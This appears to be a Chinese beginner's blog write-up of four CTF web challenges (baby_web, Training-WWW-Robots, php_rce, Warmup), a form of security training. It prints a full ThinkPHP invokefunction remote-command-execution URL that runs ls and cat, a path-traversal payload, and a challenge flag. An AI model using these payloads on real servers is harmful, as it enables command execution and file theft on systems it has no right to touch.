攻防世界进阶部分web题(baby_web,Training-WWW-Robots,php_rce,Warmup)

一、baby_web
在这里插入图片描述
点开题目链接得到在这里插入图片描述

题目描述:想想初始页面是哪个
因为初始页面是index.php
所以想到将http://220.249.52.133:50436/1.php改成http://220.249.52.133:50436/index.php
但是改完之后访问不了所以用Brupsuite抓包试试看
在这里插入图片描述
将1.php改成index.php 点击发送,得到新的数据
在这里插入图片描述
flag is hidden!
在头部找到flag
在这里插入图片描述
二、Training-WWW-Robots
点击链接后得进入这个页面在这里插入图片描述
关于robot协议在这位大佬的博客里有介绍
robot协议的相关知识
在网址后面加上/robots.txt得到页面
在这里插入图片描述
得到提示:不允许访问/f10g.php
(此地无银三百两,所以我们就访问/f10g.php)
把robots.txt改成/f10g.php
得到flag在这里插入图片描述
三、php_rce
点开链接进入页面在这里插入图片描述
上网百度发现有rce漏洞,看了别人的wp知道可以通过payload /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls列出当前目录
(刚接触不是很懂,只知道ls是列出所有目录的意思,是在学DOS命令的时候第一次看到的)
于是得到这个页面在这里插入图片描述
通过尝试访问上级目录得到不同的提示,一直往上走
http://220.249.52.133:31007/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20…/…/…/…/…/
得到有关flag的提示在这里插入图片描述
用cat命令读取
http://220.249.52.133:31007/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20…/…/…/flag
在这里插入图片描述
得到flag
————————————————————————————————
附加一道buuctf的web
Warmup
在这里插入图片描述

打开页面后得到一张滑稽的图片,想到在bugku的签到题,F12查看源代码
在这里插入图片描述

得到提示source.php,于是在网址后加上/source.php
在这里插入图片描述

有些函数看不懂,但是看到有hint.php想到去访问看看暗示了什么
在这里插入图片描述
flag写成了ffffllllaaaagggg,也许是一个提示,也许是多层目录下查找
查了不懂的函数稍微看得懂代码表达的意思
所以构造payload,得到/source.php?file=hint.php?../…/…/…/…/…/ffffllllaaaagggg
在这里插入图片描述

得到flag: flag{27587f7e-330a-4013-a2d1-d642f162b884}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值